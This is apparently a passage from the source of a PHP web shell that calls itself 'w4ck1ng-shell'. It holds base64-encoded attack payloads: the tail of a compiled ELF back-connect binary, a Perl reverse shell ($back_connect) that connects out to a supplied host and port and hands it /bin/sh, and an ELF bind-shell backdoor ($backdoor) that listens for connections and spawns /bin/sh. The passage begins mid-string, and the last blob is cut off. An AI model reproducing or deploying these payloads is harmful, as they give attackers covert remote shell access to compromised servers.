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G9iYWxfZHRvcnNfYXV4AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pDUl9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAYmFjay5jAGV4ZWNsQEBHTElCQ18yLjAAX0RZTkFNSUMAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAX19maW5pX2FycmF5X2VuZABfX2Rzb19oYW5kbGUAX19saWJjX2NzdV9maW5pAHN5c3RlbUBAR0xJQkNfMi4wAF9pbml0AGRhZW1vbkBAR0xJQkNfMi4wAF9zdGFydABzdHJsZW5AQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9pbml0AGluZXRfYWRkckBAR0xJQkNfMi4wAF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfZW5kAGR1cDJAQEdMSUJDXzIuMABzdHJjYXRAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AF9maW5pAF9fcHJlaW5pdF9hcnJheV9lbmQAYnplcm9AQEdMSUJDXzIuMABleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9UQUJMRV8AX2VuZABodG9uc0BAR0xJQkNfMi4wAGNvbm5lY3RAQEdMSUJDXzIuMABfX2luaXRfYXJyYXlfc3RhcnQAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19wcmVpbml0X2FycmF5X3N0YXJ0AF9fZ21vbl9zdGFydF9fAA==";
592
593$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkIHYwLjMpIHJldmVyc2Ugc2hlbGwgOjpcblxuIjsNCnByaW50ICJcblN5c3RlbSBJbmZvOiAiOyANCnN5c3RlbSgkc3lzdGVtKTsNCnByaW50ICJcbllvdXIgSUQ6ICI7IA0Kc3lzdGVtKCRzeXN0ZW0xKTsNCnByaW50ICJcbkN1cnJlbnQgRGlyZWN0b3J5OiAiOyANCnN5c3RlbSgkc3lzdGVtMik7DQpwcmludCAiXG4iOw0Kc3lzdGVtKCRzeXN0ZW0zKTsgc3lzdGVtKCRzeXN0ZW00KTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
594
595$backdoor="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAoIUECDQAAAD4EgAAAAAAADQAIAAHACgAIgAfAAYAAAA0AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEAAAABAAAAAAAAAACABAgAgAQIrAkAAKwJAAAFAAAAABAAAAEAAACsCQAArJkECKyZBAg0AQAAOAEAAAYAAAAAEAAAAgAAAMAJAADAmQQIwJkECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQIIAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1saW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAAAAAAABEAAAATAAAAAAAAAAAAAAAQAAAAEQAAAAAAAAAAAAAACQAAAAgAAAAFAAAAAwAAAA0AAAAAAAAAAAAAAA8AAAAKAAAAEgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABAAAAAAAAAAcAAAALAAAAAAAAAAQAAAAMAAAADgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC4AAAAAAAAAdQEAABIAAACgAAAAAAAAAHEAAAASAAAANAAAAAAAAADMAAAAEgAAAGoAAAAAAAAAWgAAABIAAABMAAAAAAAAAHgAAAASAAAAYwAAAAAAAAA5AAAAEgAAAFgAAAAAAAAAOQAAABIAAACOAAAAAAAAAOYAAAASAAAAOwAAAAAAAAA6AAAAEgAAAFMAAAAAAAAAOQAAABIAAAB1AAAAAAAAALkAAAASAAAAegAAAAAAAAArAAAAEgAAAEcAAAAAAAAAeAAAABIAAABvAAAAAAAAAA4AAAASAAAAfwAAAEiJBAgEAAAAEQAOAEAAAAAAAAAAOQAAABIAAAABAAAAAAAAAAAAAAAgAAAAFQAAAAAAAAAAAAAAIAAAAABfSnZfUmVnaXN0ZXJDbGFzc2VzAF9fZ21vbl9zdGFydF9fAGxpYmMuc28uNgBleGVjbABwZXJyb3IAZHVwMgBzb2NrZXQAc2VuZABhY2NlcHQAYmluZABzZXRzb2Nrb3B0AGxpc3RlbgBmb3JrAGh0b25zAGV4aXQAYXRvaQBfSU9fc3RkaW5fdXNlZABfX2xpYmNfc3RhcnRfbWFpbgBjbG9zZQBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAQACAAAAAAAAAAEAAQAkAAAAEAAAAAAAAAAQaWkNAAACAKYAAAAAAAAAiJoECAYSAACYmgQIBwEAAJyaBAgHAgAAoJoECAcDAACkmgQIBwQAAKiaBAgHBQAArJoECAcGAACwmgQIBwcAALSaBAgHCAAAuJoECAcJAAC8mgQIBwoAAMCaBAgHCwAAxJoECAcMAADImgQIBw0AAMyaBAgHDgAA0JoECAcQAABVieWD7AjoMQEAAOiDAQAA6FsEAADJwwD/NZCaBAj/JZSaBAgAAAAA/yWYmgQIaAAAAADp4P////8lnJoECGgIAAAA6dD/////JaCaBAhoEAAAAOnA/////yWkmgQIaBgAAADpsP////8lqJoECGggAAAA6aD/////JayaBAhoKAAAAOmQ/////yWwmgQIaDAAAADpgP////8ltJoECGg4AAAA6XD/////JbiaBAhoQAAAAOlg/////yW8mgQIaEgAAADpUP////8lwJoECGhQAAAA6UD/////JcSaBAhoWAAAAOkw/////yXImgQIaGAAAADpIP////8lzJoECGhoAAAA6RD/////JdCaBAhocAAAAOkA////Me1eieGD5PBQVFJorYgECGhciAQIUVZoQIYECOhf////9JCQVYnlU+gbAAAAgcO/FAAAg+wEi4P8////hcB0Av/Qg8QEW13Dixwkw1WJ5YPsCIA94JoECAB0DOscg8AEo9yaBAj/0qHcmgQIixCF0nXrxgXgmgQIAcnDVYnlg+wIobyZBAiFwHQSuAAAAACFwHQJxwQkvJkECP/QycOQkFWJ5VeD7GSD5PC4AAAAAIPAD4PAD8HoBMHgBCnEx0XkAQAAAMdF+EyJBAjHRCQIAAAAAMdEJAQBAAAAxwQkAgAAAOgJ////iUXwg33wAHkYxwQkjIkECOg0/v//xwQkAQAAAOio/v//ZsdF1AIAx0XYAAAAAItFDIPABIsAiQQk6Jv+//8Pt8CJBCTosP7//2aJRdbHRCQQBAAAAI1F5IlEJAzHRCQIAgAAAMdEJAQBAAAAi0XwiQQk6BL+//+NRdTHRCQIEAAA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